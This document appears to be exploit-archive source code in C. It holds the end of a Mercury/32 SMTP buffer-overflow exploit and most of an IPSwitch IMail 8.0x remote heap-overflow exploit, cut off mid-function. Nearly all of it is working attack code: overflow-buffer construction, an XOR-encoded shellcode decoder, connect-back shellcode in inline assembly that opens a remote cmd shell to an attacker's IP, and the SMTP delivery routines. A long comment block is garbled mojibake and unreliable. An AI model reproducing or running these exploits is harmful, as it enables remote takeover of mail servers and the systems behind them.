{
memcpy(fsh, shellcodes[sh].shellcode, shellcodes[sh].length);
*fshlen = shellcodes[sh].length;
}
void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh)
{
// prepare shellcode
char fsh[10000];
unsigned int fshlen;
memset(fsh, 0, sizeof(fsh));
prepare_shellcode(fsh, &fshlen, sh);
// -----------------
// make buffer with shellcode inside
unsigned char * cp=buf;
// init
memset(cp, '\x41', 1300);
cp+=204;
// replace EIP
*cp++ = (char)((targets[itarget].ret ) & 0xff);
*cp++ = (char)((targets[itarget].ret >> 8) & 0xff);
*cp++ = (char)((targets[itarget].ret >> 16) & 0xff);
*cp++ = (char)((targets[itarget].ret >> 24) & 0xff);
// jff
*cp++ = '\x90';
*cp++ = '\x90';
*cp++ = '\x90';
*cp++ = '\x90';
// copy the shellcode
memcpy(cp, fsh, fshlen);
cp+=fshlen;
*len = (unsigned int)(cp-buf);
// -----------------
}
int send_buffer(unsigned char * buf, unsigned int len, char * remotehost, int port)
{
char bufmax[4096], sendbuf[5000];
SOCKET s;
s = do_connect(remotehost, port);
memset(bufmax, 0 , sizeof(bufmax));
recv(s, bufmax, sizeof(bufmax),0);
bufmax[sizeof(bufmax)-1] = 0;
printf("[+] Server: %s\n", bufmax);
// send EHLO
memset(sendbuf, 0, sizeof(sendbuf));
strcat(sendbuf, "EHLO Dreatica-FXP\r\n");
printf("[+] Request: EHLO Dreatica-FXP\n");
send(s, sendbuf, (int)strlen(sendbuf),0);
// send AUTH CRAM-MD5
memset(sendbuf, 0, sizeof(sendbuf));
strcat(sendbuf, "AUTH CRAM-MD5\r\n");
printf("[+] Request: AUTH CRAM-MD5\n");
send(s, sendbuf, (int)strlen(sendbuf),0);
// i don't make the correct recv procedure like Zhenhan.Liu have done in his code
// just put 3 recv for that
memset(bufmax, 0 , sizeof(bufmax));
recv(s, bufmax, sizeof(bufmax),0);
bufmax[sizeof(bufmax)-1] = 0;
printf("[+] Reply: %s\n",bufmax);
memset(bufmax, 0 , sizeof(bufmax));
recv(s, bufmax, sizeof(bufmax),0);
bufmax[sizeof(bufmax)-1] = 0;
printf("[+] Reply: %s\n",bufmax);
memset(bufmax, 0 , sizeof(bufmax));
recv(s, bufmax, sizeof(bufmax),0);
bufmax[sizeof(bufmax)-1] = 0;
printf("[+] Reply: %s\n",bufmax);
// ALL is OKE
printf("[+] Sending payload...\n");
memset(sendbuf, 0, sizeof(sendbuf));
base64_encode(buf, len, sendbuf);
sendbuf[strlen(sendbuf)]= '\r';
sendbuf[strlen(sendbuf)]= '\n';
send(s, sendbuf, (int)strlen(sendbuf), 0);
closesocket(s);
return 1;
}
// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring)
{
static char *next = NULL;
if (optind == 0)
next = NULL;
optarg = NULL;
if (next == NULL || *next == '\0')
{
if (optind == 0)
optind++;
if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0')
{
optarg = NULL;
if (optind < argc)
optarg = argv[optind];
return EOF;
}
if (strcmp(argv[optind], "--") == 0)
{
optind++;
optarg = NULL;
if (optind < argc)
optarg = argv[optind];
return EOF;
}
next = argv[optind];
next++; // skip past -
optind++;
}
char c = *next++;
char *cp = strchr(optstring, c);
if (cp == NULL || c == ':')
return '?';
cp++;
if (*cp == ':')
{
if (*next != '\0')
{
optarg = next;
next = NULL;
}
else if (optind < argc)
{
optarg = argv[optind];
optind++;
}
else
{
return '?';
}
}
return c;
}
// -----------------------------------------------------------------
// -----------------------------------------------------------------
// -----------------------------------------------------------------
void usage(char * s)
{
printf("\n");
printf(" Usage: %s -p <port> -h <host> -s <shellcode> -t <target>\n\n", s);
printf(" Arguments:\n");
printf(" -p <port> Port of the Mercury SMTP (default: 25)\n");
printf(" -h <host> Hostname of the server\n");
printf(" -s <shellcode> Payload to use (default: 1)\n");
printf(" -t <target> Target to attack (default: 1)\n");
printf("\n");
printf(" Shellcodes:\n");
for(int i=0; shellcodes[i].name!=0;i++)
{
printf(" %d. %s\n",i+1,shellcodes[i].name);
}
printf("\n");
printf(" Targets:\n");
for(int j=0; targets[j].t!=0;j++)
{
printf(" %d. %s\n",j+1,targets[j].t);
}
printf("\n");
end_logo();
}
void logo()
{
printf("\n\n");
printf(" ################################################## ##################### \n");
printf(" # ____ __ _ ______ __ _____ #\n");
printf(" # / __ \\________ _____/ /_(_)_________ / __/\\ \\/ / / _ / #\n");
printf(" # / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___ / / \\ / / // / #\n");
printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \\ / ___/ #\n");
printf(" # /_____/_/ \\___/ \\_,_/\\__/_/\\___/\\__,_/ /_/ /_/\\_\\/_/ #\n");
printf(" # crew #\n");
printf(" ################################################## ##################### \n");
printf(" # Exploit : Mercury/32 v3.32-v4.51 SMTP EIP overwrite exploit # \n");
printf(" # Tested : Mercury/32 SMTP v3.32, v4.01a, v4.51 # \n");
printf(" # Author : Heretic2 (http://www.dreatica.cl/) # \n");
printf(" # Research: eliteb0y # \n");
printf(" # Version : 1.0 # \n");
printf(" # System : Windows ALL # \n");
printf(" # Date : 26.08.2007 # \n");
printf(" # ------------------------------------------------------------------- # \n");
}
void end_logo()
{
printf(" # ------------------------------------------------------------------- # \n");
printf(" # Dreatica-FXP crew [Heretic2] # \n");
printf(" ################################################## ##################### \n\n");
}
// [2007-08-26]
25 IPSwitch IMail Server 8.0x Remote Heap Overflow Exploit
/*
by axis
2007-06-05
http://www.ph4nt0m.org
Mail-List: http://list.ph4nt0m.org
ÒÔÇ°ÓÃ� �ÕâžöÒ� �»Å¾Ã¶imailµÄexp
PRIVATE Remote Exploit For IMAIL Smtp Server(1.2)
This is For imail 8.01-8.11 version
Usage:faint.exe -d <host> [options]
Options:
-d: Hostname to attack [Required]
-t: Type [Default: 0]
-p: Attack port [Default: 25]
-S: the IP connect back to.
-P: the port connect back to.
Types:
0: win2k All version , IMail 8.01-11
²»ÖªµÃ� �€ÃƒÂŠÃƒÂ‡ÃƒÂ„ÄÎÃ� ��»Å½Ã³Ã…£ÃÂ� �…½ÂµÃ„
×îœü¿Å� �½ÃƒÂË¿Ž£Ã� ��¬
·Ç³£ºÃ� �ƒÃƒÂæµÄÒÃ� �»Å¾Ã¶Ã‚©¶� �…½Â¡Â£
©¶ŽÊà‡Ã‚·Â¢Ã‰ÃºÃ”Ã� �šiaspam.dllÀï
loc_1001ada5 ==> ×¢Òâ¶Â� �¯ÃƒÂŒÃ‚¬ÂµÃ·ÃŠÃ� �”ʱºò×Ã� ��¢Ã’âŒÓÃÂ� �Ø»ùÖ·Â� �µÃƒÂ„²»Ã¬Ã� ��¡Â£
mov eax, [ebp+var_54]
mov ecx, [eax+10c8h]
push ecx ; char *
mov edx, [ebp+var_54]
mov eax, [edx+10d0h]
push eax ; char *
call _strcpy
add esp, 8
jmp loc_1001a6f0
͉˕strcpyµ� �ƒÂ„ÃÂœžöbuffer� �‚£Â¬srcºÃÂdstµ� �ƒÂ„ÖžÕ렣¬ŸÓȻà ŠÃ‡Ã–±œÓ ŽÓ¶ÑÀÃ� �¯Ã‚¶Ã³öÀÃ� �½ÂµÃ„¡£
¶øÖ®ÇÂ� �°ÃƒÂƒÃ‚»Ã“ÃÂ×à ¶ÃˆÃŽÂºÃŽÅ’Ã� �¬Â²Ã©
ËùÒÔ·Â� �¢ÃƒÂ‹ÃƒÂžöÓà ŠÅ’þµœ· þÎñÆ÷£ ¬SMDÎÄŒþ
È»ºóÔÃÂ� �Æäºóµà„Æ«ÒÆŽà … Â¿Ã˜Ã–ÆÕà¢ÃƒÂœžöµÃ ˜Ã–·£¬Ÿ� �ƒÂ¿ÉÒÔ ¿Ã…“±ŽÈÎà ’â×Ö·ûà …½Â®ÂµÅ“ÈÃÂ� �ÒâÄÚŽà¦Ã‚¡Â£
badcharÊÇ 0x00 0x0a emm˵»¹Óà ƒÂžö 0x25,²»¹ýÎà ƒÂ’ûÕÒÂÂ� �œ¡£
ÒÔÇ°ÃÂà¸ÃƒÂ‰ÃƒÂÄǞà ¶Â·Å½ÃÂµà ƒÂ„°æ±ŸÂÂ� �¬ÊÇÀûà“ÃÃÂËž²Ã� �¾Ã‡pebÀïµÃÂ� ��ÖžÕë¡Ã� �£
ÕâÖÖ·Å� �“·šÔÚ2003ÃÂ� ��ò»ÄÜÃ� �“á£
ÕâÀïÎÃÂ� �²ÉÓÃÃÂà‹emmµÄ·œ ·Ã…¡Â£Â¬Â¹Â¹Ã� �”ìÃÂËÒ»� �…¾Ã¶Ã’ç³ö
ÒòΪimailsec.dllÃ� �µÃ„.data¶Î¿Ã� �‰ÃƒÂŽ¡£
ËùÒÔÎÃÂ� ��ÕÒµœÃÂÃ� �‹Ã•Ã¢ÃƒÅ½Ã’� �‚»Å¾Ã¶ÂµÃ˜ÂÂ� �œ
1000CB5D 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
1000CB60 50 PUSH EAX
1000CB61 8B0D 6C540310 MOV ECX,DWORD PTR DS:[1003546C] ; IMailsec.1003549C
1000CB67 51 PUSH ECX
1000CB68 8D95 FCFDFFFF LEA EDX,DWORD PTR SS:[EBP-204]
1000CB6E 52 PUSH EDX
1000CB6F FF15 F8D30210 CALL DWORD PTR DS:[<&USER32.wsprintfA>] ; USER32.wsprintfA
ÆäÖÃÂÖŠ¾ÃƒÂ•ÃƒÂ«DWORD PTR DS:[1003546C] ÔÚimailsec.dllµÄ.da taÖã¬Õà ¢Å¾Ã¶ÂµÃ˜Ã–Ã� ��·Â¿Ã‰Ã’ÔÂÂ� �»ÎÒÃÇÅ� �¾Ã‚²Å¾Ã‡Â¡Â£
ËùÒÔÎÃÂ� ��ÃǟÿÃ� �‰ÃƒÂ’Ô¹¹Ô� �ƒÂ¬ÃƒÂ’»žöÃÂ� �ç³ö¡£
ˌ·ÈÃ� �§ÃƒÂ壼
µÚÒ»·à¢ÃƒÂ“ÊŒþ£Ã� �º ·¢ËÃÂshellcodeÂ� �µÃ…“ÄÚŽæÃ� �–ñ£Žæ� �‚ºÃƒÂ¡Â£Ã•ÃÂ� �ÀïÎÒ·à…µœÃÂËtebÃÂ� �ÃÂ
µÚ¶þ·ÃÂ� �ÓÊŒþ£Â º ·¢ËÃÂÒà§Ã‚³Ã¶ÃÂèÒÂ� �ªÃ‚µÃ„ž²žà ƒÂ‡ÃƒÂ—Ö·ûÅÂ� �®µœÄÚÃ� �½Ã¦Ã–ñ£à …½Ã¦ÂºÃƒÂ¡Â£ ÕâÀïÎÃÂ� �Ò²·ÅÔà šÃÂËtebÖÃÂ
µÚÈý·â ÓÊŒþ£Â� �º ž²žÇimailsec.dllà ƒÂ–Ã嵀 .data¶ÎµÄÖ� �…¾Ã•Ã«Â£Â¬ÃÂ� �¹wsprintfAÔì³Ã� �‰ÃƒÂ’ç³ö
Òç³öž ²Ã…¾Ã‡ÃŠÂ¹Ã“à ƒÂµÃ„×Ö·� �ƒÂ»Ã…½Â®ÃŠÃ‡ÂÂ� �Ú¶þ·âÃÂ� ��ÊŒþ·¢Ã ‹Ã¹ýÈ¥Ã� ��µÃ„£¬žÂÂ� �žÇºóµÃ� �„·µ»Øµà ƒÂ˜ÃƒÂ–·Ö±ÅÂ� ��ÓÖžÃÂòÃ� �˵ÚÒ»Ã� ��·Ã¢Ã“ÊŒþ� �‚·Â¢Ã‹Ã¹ÃÂ� �È¥µÄshellcodeÃ� �”ÚÄÚŽæà –ÃµĵØà ƒÂ–·¡£
ËùÒÔÕà¢Ã…¾Ã¶Ã‚©¶Ã� �½ÃŠÃ‡ÂºÃÂÆà …“ÌšÎÞ¹ صģ¡Â� �£Ã‚¡Â²Â»ÃÂèà ’ªÈκÎopc ode£¡£¡
ÔÚʵŒàŠÃƒÂ€ÃƒÂ»ÃƒÂ“ÃÊÂ� �±ÃƒÂŽÃƒÂ’·¢ËÃ� �ÂÃÂË4·âÓ� �ƒÂŠÃ…’þ£¬ µÃƒÂšÃƒÂ’»·âÃ� �ŠÃƒÂ‡Ã‚·ÃÂÓÊÃ� �’þ£¬ÓÃ� �ƒÂ“ÚÌážß� �‚³Ã‰Â¹Å Ã‚Ê¡£
ÓÉÓÚ»Â� �¥ÃƒÂªÃÂøµÃ� �„spam·ºÀÄÂ� �£Ã‚¬Ã‹Ã¹Ã’ÔÃ� ��µÃˆÂµÅ“ÓÊ Œþ·þÎÃÂ� �Æ÷ŽŠÀÃÂ*©¶Š½ÃƒÂ“ÊŒþÊ ±Â£Â¬Ã’²ÃÂà ƒÂ*ÒÑŸÂÂ*¹� �ƒÂ½ÃƒÂËŒžŠ¾ÃƒÂ¶ÃƒÂ”ÂÃÂË ¡Â£Â¡Â£Â¡Â£
ËùÒÔ×à®Ã‚ºÃƒÂµÃ„·Ã� �“°žÊÇÊ� �‚¹Ã“Ãdownload+exec µÄshellcode¡£
ÕâÀïžÃÂ� �³öÒ»žÃ� �¶Ã‚±ÃˆÅ“ÃÂÀÃ� �ƒÂµÃ„·ŽÃÂ� �‚¬shellcode×÷ÎÂÂ� �poc¡£
ŸÃÂemm˵ÕÃ� �¢Å¾Ã¶Ã‚©¶� �…½Ã’»Ö±àƒÃ‚»Â²Â¹Â£Â¬Ã� �–»ÊÇžß� �‚°Ã¦Â±Å¸ÃƒÂÂ� �ÓÃÂÃÂË¡Â� �£Ã‚¡Â£Â¡Â£
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <winsock.h>
#include <io.h>
#pragma comment (lib,"ws2_32")
char *szEHLO = "HELO\r\n";
char *szMF = "MAIL FROM <****er@****imail.org>\r\n";
char *szRCPT = "RCPT TO: <postmaster>\r\n";
char *szDATA = "DATA\r\n";
char *szTIME = "Date: Thu, 1 Oct 2007 07:06:09 +0800\r\n";
char *szMIME = "MIME\r\n";
char *szEND = ".\r\n";
char *szQUIT = "QUIT\r\n";
char *szCT = "Content-Type: multipart/boundary=";
char *szCTE = "Content-Transfer-Encoding:";
//#define SCaddr "\x50\xe7\x03\x10"
#define SCaddr "\x50\xc8\xfd\x7f"
#define ****_ptr "\x6c\x54\x03\x10" //0x1003546c
#define Teb_temp1 0x7ffdd050
#define Teb_temp2 0x7ffdd040
#define Teb_temp3 0x7ffdd030
unsigned short port = 25;
unsigned char payload[5000] = "";
#define PROC_BEGIN __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90\
__asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90
#define PROC_END PROC_BEGIN
unsigned char sh_Buff[2048];
unsigned int sh_Len;
unsigned int Enc_key=0x99; //ÆäʵÎÞ ¹ØœôÒÂ� �ª,¶¯Ì¬Ñà ‚°Ã•Ã’
unsigned char decode1[] =
/*
00401004 . /EB 0E JMP SHORT encode.00401014
00401006 $ |5B POP EBX
00401007 . |4B DEC EBX
00401008 . |33C9 XOR ECX,ECX
0040100A . |B1 FF MOV CL,0FF
0040100C > |80340B 99 XOR BYTE PTR DS:[EBX+ECX],99
00401010 .^|E2 FA LOOPD SHORT encode.0040100C
00401012 . |EB 05 JMP SHORT encode.00401019
00401014 > \E8 EDFFFFFF CALL encode.00401006
*/
"\xEB\x0E\x5B\x4B\x33\xC9\xB1"
"\xFF" // shellcode size
"\x80\x34\x0B"
"\xB8" // xor byte
"\xE2\xFA\xEB\x05\xE8\xED\xFF\xFF\xFF";
unsigned char decode2[] =
/*
00406030 /EB 10 JMP SHORT 00406042
00406032 |5B POP EBX
00406033 |4B DEC EBX
00406034 |33C9 XOR ECX,ECX
00406036 |66:B9 6601 MOV CX,166
0040603A |80340B 99 XOR BYTE PTR DS:[EBX+ECX],99
0040603E ^|E2 FA LOOPD SHORT 0040603A
00406040 |EB 05 JMP SHORT 00406047
00406042 \E8 EBFFFFFF CALL 00406032
*/
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9"
"\x66\x01" // shellcode size
"\x80\x34\x0B"
"\xB8" // xor byte
"\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF";
// kernel32.dll functions index
#define _LoadLibraryA 0x00
#define _CreateProcessA 0x04
//#define _ExitProcess 0x08
#define _ExitThread 0x08
#define _WaitForSingleObject 0x0C
// ws2_32.dll functions index
#define _WSASocketA 0x10
#define _connect 0x14
#define _closesocket 0x18
//#define _WSAStartup 0x1C
// functions number
#define _Knums 4
#define _Wnums 3
// Need functions
unsigned char functions[100][128] =
{ // [esi] stack layout
// kernel32 4 // 00 kernel32.dll
{"LoadLibraryA"}, // [esi]
{"CreateProcessA"}, // [esi+4]
{"ExitThread"}, // [esi+8]
//{"ExitProcess"},
//{"TerminateProcess"},
{"WaitForSingleObject"}, // [esi+12]
// ws2_32 3 // 01 ws2_32.dll
{"WSASocketA"}, // [esi+16]
{"connect"}, // [esi+20]
{"closesocket"}, // [esi+24]
//{"WSAStartup"}, // [esi+28]
{""},
};
void PrintSc(unsigned char *lpBuff, int buffsize);
void ShellCode();
// Get function hash
unsigned long hash(unsigned char *c)
{
unsigned long h=0;
while(*c)
{
h = ( ( h << 25 ) | ( h >> 7 ) ) + *c++;
}
return h;
}
// get shellcode
void GetShellCode(char* ipstr, short port)
{
char *fnbgn_str="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
char *fnend_str="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
unsigned char *pSc_addr;
unsigned char pSc_Buff[2048];
unsigned int MAX_Sc_Len=0x2000;
unsigned long dwHash[100];
unsigned int dwHashSize;
unsigned int l,i,j,k;
char *p;
int ip;
// Get functions hash
for (i=0;;i++) {
if (functions[i][0] == '\x0') break;
dwHash[i] = hash(functions[i]);
//fprintf(stderr, "%.8X\t%s\n", dwHash[i], functions[i]);
}
dwHashSize = i*4;
// Deal with shellcode
pSc_addr = (unsigned char *)ShellCode;
for (k=0;k<MAX_Sc_Len;++k ) {
if(memcmp(pSc_addr+k,fnbgn_str, 8)==0) {
break;
}
}
pSc_addr+=(k+8); // start of the ShellCode
for (k=0;k<MAX_Sc_Len;++k) {
if(memcmp(pSc_addr+k,fnend_str, 8)==0) {
break;
}
}
sh_Len=k; // length of the ShellCode
memcpy(pSc_Buff, pSc_addr, sh_Len);
for(k=0; k<sh_Len; ++k)
{
if(memcmp(pSc_Buff+k, "\x68\x7F\x00\x00\x01", 5) == 0)
{
ip = inet_addr(ipstr);
p = (char*)&ip;
pSc_Buff[k+1] = p[0];
pSc_Buff[k+2] = p[1];
pSc_Buff[k+3] = p[2];
pSc_Buff[k+4] = p[3];
}
if(memcmp(pSc_Buff+k, "\x68\x02\x00\x00\x35", 5) == 0)
{
p = (char*)&port;
pSc_Buff[k+3] = p[1];
pSc_Buff[k+4] = p[0];
}
}
// Add functions hash
memcpy(pSc_Buff+sh_Len, (unsigned char *)dwHash, dwHashSize);
sh_Len += dwHashSize;
//printf("%d bytes shellcode\n", sh_Len);
// print shellcode
//PrintSc(pSc_Buff, sh_Len);
// find xor byte
for(i=0xff; i>0; i--)
{
l = 0;
for(j=0; j<sh_Len; j++)
{
if (
// ((pSc_Buff[j] ^ i) == 0x26) || //%
// ((pSc_Buff[j] ^ i) == 0x3d) || //=
// ((pSc_Buff[j] ^ i) == 0x3f) || //?
//((pSc_Buff[j] ^ i) == 0x40) || //@
((pSc_Buff[j] ^ i) == 0x00) ||
//((pSc_Buff[j] ^ i) == 0x3c) ||
//((pSc_Buff[j] ^ i) == 0x3e) ||
// ((pSc_Buff[j] ^ i) == 0x2f) ||
// ((pSc_Buff[j] ^ i) == 0x22) ||
// ((pSc_Buff[j] ^ i) == 0x2a) ||
//((pSc_Buff[j] ^ i) == 0x3a) ||
// ((pSc_Buff[j] ^ i) == 0x20) ||
((pSc_Buff[j] ^ i) == 0x25) ||
((pSc_Buff[j] ^ i) == 0x0D) ||
((pSc_Buff[j] ^ i) == 0x0A)
// ((pSc_Buff[j] ^ i) == 0x5C)
)
{
l++;
break;
};
}
if (l==0)
{
Enc_key = i;
//printf("Find XOR Byte: 0x%02X\n", i);
for(j=0; j<sh_Len; j++)
{
pSc_Buff[j] ^= Enc_key;
}
break; // break when found xor byte
}
}
// No xor byte found
if (l!=0){
//fprintf(stderr, "No xor byte found!\n");
sh_Len = 0;
}
else {
//fprintf(stderr, "Xor byte 0x%02X\n", Enc_key);
// encode
if (sh_Len > 0xFF) {
*(unsigned short *)&decode2[8] = sh_Len;
*(unsigned char *)&decode2[13] = Enc_key;
memcpy(sh_Buff, decode2, sizeof(decode2)-1);
memcpy(sh_Buff+sizeof(decode2)-1, pSc_Buff, sh_Len);
sh_Len += sizeof(decode2)-1;
}
else {
*(unsigned char *)&decode1[7] = sh_Len;
*(unsigned char *)&decode1[11] = Enc_key;
memcpy(sh_Buff, decode1, sizeof(decode1)-1);
memcpy(sh_Buff+sizeof(decode1)-1, pSc_Buff, sh_Len);
sh_Len += sizeof(decode1)-1;
}
}
}
// print shellcode
void PrintSc(unsigned char *lpBuff, int buffsize)
{
int i,j;
char *p;
char msg[4];
printf("/* %d bytes */\n",buffsize);
for(i=0;i<buffsize;i++)
{
if((i%16)==0)
if(i!=0)
printf("\"\n\"");
else
printf("\"");
sprintf(msg,"\\x%.2X",lpBuff[i]&0xff);
for( p = msg, j=0; j < 4; p++, j++ )
{
if(isupper(*p))
printf("%c", _tolower(*p));
else
printf("%c", p[0]);
}
}
printf( "\";\n");
}
// ShellCode function
void ShellCode()
{
__asm
{
PROC_BEGIN // C macro to begin proc
jmp sc_end
sc_start:
pop edi // Hash string start addr (esp -> edi)
// Get kernel32.dll base addr
mov eax, fs:0x30 // PEB
mov eax, [eax+0x0c] // PROCESS_MODULE_INFO
mov esi, [eax+0x1c] // InInitOrder.flink
lodsd // eax = InInitOrder.blink
mov ebp, [eax+8] // ebp = kernel32.dll base address
mov esi, edi // Hash string start addr -> esi
// Get function addr of kernel32
push _Knums
pop ecx
get_kernel32:
call GetProcAddress_fun
loop get_kernel32
// Get ws2_32.dll base addr
push 0x00003233
push 0x5f327377
push esp
call dword ptr [esi+_LoadLibraryA] // LoadLibraryA("ws2_32");
//mov ebp, eax // ebp = ws2_32.dll base address
xchg eax, ebp
// Get function addr of ws2_32
push _Wnums
pop ecx
get_ws2_32:
call GetProcAddress_fun
loop get_ws2_32
//
/*
//LWSAStartup:
sub esp, 400
push esp
push 0x101
call dword ptr [esi+_WSAStartup] // WSAStartup(0x101, &WSADATA);
//
*/
//LWSASocketA:
push ecx
push ecx
push ecx
push ecx
push 1
push 2
call dword ptr [esi+_WSASocketA] // s=WSASocketA(2,1,0,0,0,0);
//mov ebx, eax // socket -> ebx
xchg eax, ebx
//Lconnect:
//int 3
push 0x0100007F // host: 127.0.0.1
push 0x35000002 // port: 53
mov ebp, esp
push 0x10 // sizeof(sockaddr_in)
push ebp // sockaddr_in address
push ebx // socket s
call dword ptr [esi+_connect] // connect(s, name, sizeof(name));
// if connect failed , exit
test eax, eax
jne Finished
// xor eax, eax
// allot memory for STARTUPINFO, PROCESS_INFORMATION
mov edi, esp
// zero out SI/PI
push 0x12
pop ecx
stack_zero:
stosd
loop stack_zero
//mov byte ptr [esp+0x10], 0x44 // si.cb = sizeof(si)
//inc byte ptr [esp+0x3C] // si.dwFlags
//inc byte ptr [esp+0x3D] // si.wShowWindow
//mov [esp+0x48], ebx // si.hStdInput = s
//mov [esp+0x4C], ebx // si.hStdOutput = s
//mov [esp+0x50], ebx // si.hStdError = s
mov word ptr [esp+0x3c], 0x0101
xchg eax, ebx
stosd
stosd
stosd
mov edi, esp
// push "cmd"
push 0x00646d63 // "cmd"
mov ebp, esp
push eax // socket
//LCreateProcess:
lea eax, [edi+0x10]
push edi // pi
push eax // si
push ecx // lpCurrentDirectory
push ecx // lpEnvironment
push ecx // dwCreationFlags
push 1 // bInheritHandles
push ecx // lpThreadAttributes
push ecx // lpProcessAttributes
push ebp // lpCommandLine = "cmd"
push ecx // lpApplicationName NULL
call dword ptr [esi+_CreateProcessA] // CreactProcessA(NULL,"CMD",0,0,1,0,0,0,si, pi);
//LWaitForSingleObject:
//push 1
push 0xFFFFFFFF
push dword ptr [edi]
call dword ptr [esi+_WaitForSingleObject] // WaitForSingleObject(Handle, time) ;
//LCloseSocket:
//push ebx
call dword ptr [esi+_closesocket] // closesocket(c);
Finished:
// »ÖžŽ¹Â ¹Ã”ìµÄÒà ƒÂ§Ã‚³Ã¶ÂµÃ£
mov eax, 0x1003546c
mov DWORD ptr [eax], 0x1003549c
mov DWORD ptr [eax+4], 0x100354c8
mov DWORD ptr [eax+8], 0x100354e0
//push 1
//call dword ptr [esi+_ExitProcess] // ExitProcess();
xor eax, eax
push eax
call dword ptr [esi+_ExitThread]
//
GetProcAddress_fun:
push ecx
push esi
mov esi, [ebp+0x3C] // e_lfanew
mov esi, [esi+ebp+0x78] // ExportDirectory RVA
add esi, ebp // rva2va
push esi
mov esi, [esi+0x20] // AddressOfNames RVA
add esi, ebp // rva2va
xor ecx, ecx
dec ecx
find_start:
inc ecx
lodsd
add eax, ebp
xor ebx, ebx
hash_loop:
movsx edx, byte ptr [eax]
cmp dl, dh
jz short find_addr
ror ebx, 7 // hash key
add ebx, edx
inc eax
jmp short hash_loop
find_addr:
cmp ebx, [edi] // compare to hash
jnz short find_start
pop esi // ExportDirectory
// AddressOfNameOrdinals RVA
/*
//--------------------------------------------------------
jmp over_it
__asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40
__asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40
__asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40
__asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40
//--------------------------------------------------------
over_it:
*/
mov ebx, [esi+0x24]
add ebx, ebp // rva2va
mov cx, [ebx+ecx*2] // FunctionOrdinal
mov ebx, [esi+0x1C] // AddressOfFunctions RVA
add ebx, ebp // rva2va
mov eax, [ebx+ecx*4] // FunctionAddress RVA
add eax, ebp // rva2va
stosd // function address save to [edi]
pop esi
pop ecx
ret
sc_end:
call sc_start
PROC_END //C macro to end proc
}
}
// ripped from isno
int Make_Connection(char *address,int port,int timeout)
{
struct sockaddr_in target;
SOCKET s;
int i;
DWORD bf;
fd_set wd;
struct timeval tv;
s = socket(AF_INET,SOCK_STREAM,0);
if(s<0)
return -1;
target.sin_family = AF_INET;
target.sin_addr.s_addr = inet_addr(address);
if(target.sin_addr.s_addr==0)
{
closesocket(s);
return -2;
}
target.sin_port = htons((short)port);
bf = 1;
ioctlsocket(s,FIONBIO,&bf);
tv.tv_sec = timeout;
tv.tv_usec = 0;
FD_ZERO(&wd);
FD_SET(s,&wd);
connect(s,(struct sockaddr *)&target,sizeof(target));
if((i=select(s+1,0,&wd,0,&tv))==(-1))
{
closesocket(s);
return -3;
}
if(i==0)
{
closesocket(s);
return -4;
}
i = sizeof(int);
getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
if((bf!=0)||(i!=sizeof(int)))
{
closesocket(s);
return -5;
}
ioctlsocket(s,FIONBIO,&bf);
return s;
}
void Disconnect(SOCKET s)
{
closesocket(s);
WSACleanup();
}
void help(char *n)
{
printf("==Usage:\n");
printf("%s [target ip] [target port] [local ip] [local port]\n\n", n);
printf("We will send 4 mail to trigger the vuln.\n");
printf("The ****ing vuln will be triggered when the mail server handling the mail.\n");
printf("Because of the Spam in the internet,\nthe vuln maybe triggered after a few days!!****!!\n\n");
}
int send****ingmail(int the_mail, char *target, int tg_port)
{
SOCKET s;
WSADATA WSAData;
char buffer[1000] = {0}; // ÃÂÙʱbufferÓ� �ƒÂƒÃƒÂ“Úio
int ret;
char padding[5000] = {0}; // paddingÓÃÓÚÌ� �ƒÂ®Ã‚³Ã¤
if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
{
fprintf(stderr, "[-] WSAStartup failed.\n");
WSACleanup();
exit(1);
}
s = Make_Connection(target, tg_port, 10);
if(s<0)
{
fprintf(stderr, "[-] connect err.\n");
exit(1);
}
recv(s, buffer, sizeof(buffer), 0);
Sleep(1000);
ret = strlen(buffer);
if ( ret < 10 )
{
printf("[-]Seems Service Down~ :( \n");
Disconnect(s);
return -1;
}
printf("[+]Got Banner: %s", buffer);
// HELO
send(s, szEHLO, strlen(szEHLO), 0);
recv(s, buffer, sizeof(buffer), 0);
// printf("%s", buffer);
printf("[+]Say hello to Server.\n");
memset(buffer, 0, sizeof(buffer));
// MAIL FROM
Sleep(500);
send(s, szMF, strlen(szMF), 0);
recv(s, buffer, sizeof(buffer), 0);
if(strstr(buffer, "250"))
printf("[+]Recv: %s", buffer);
else
{
printf("[-]Seems Service Down~ :( \n");
Disconnect(s);
return -1;
}
memset(buffer, 0, sizeof(buffer));
// RCPT TO
Sleep(500);
send(s, szRCPT, strlen(szRCPT), 0);
recv(s, buffer, sizeof(buffer), 0);
if(strstr(buffer, "250"))
printf("[+]Recv: %s", buffer);
else
{
printf("[-]Seems Service Down~ :( \n");
Disconnect(s);
return -1;
}
memset(buffer, 0, sizeof(buffer));
// DATA
Sleep(500);
send(s, szDATA, strlen(szDATA), 0);
recv(s, buffer, sizeof(buffer), 0);
if(strstr(buffer, "354"))
printf("[+]Recv: %s", buffer);
else
{
printf("[-]Seems Service Down~ :( \n");
Disconnect(s);
return -1;
}
memset(buffer, 0, sizeof(buffer));
Sleep(100);
// TIME
send(s, szTIME, strlen(szTIME), 0);
// recv(s, buffer, sizeof(buffer), 0);
// printf("%s", buffer);
printf("[+]****ing Server at %s", szTIME);
memset(buffer, 0, sizeof(buffer));
Sleep(200);
